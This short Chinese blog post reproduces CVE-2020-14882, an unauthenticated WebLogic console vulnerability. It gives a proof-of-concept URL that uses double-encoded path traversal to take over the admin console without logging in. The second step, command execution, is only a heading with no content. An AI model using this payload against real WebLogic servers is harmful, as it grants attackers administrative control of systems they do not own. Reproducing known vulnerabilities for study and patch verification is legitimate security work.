cve-2020-14882 Weblogic未授权命令执行复现
漏洞复现:
1.构造PoC,可以直接未授权接管后台:
http://ip:port/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=AppDeploymentsControlPage&handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDomain%22%29
2.命令执行----->疯
原创
2021-08-11 09:38:03 ·
159 阅读 ·
0 评论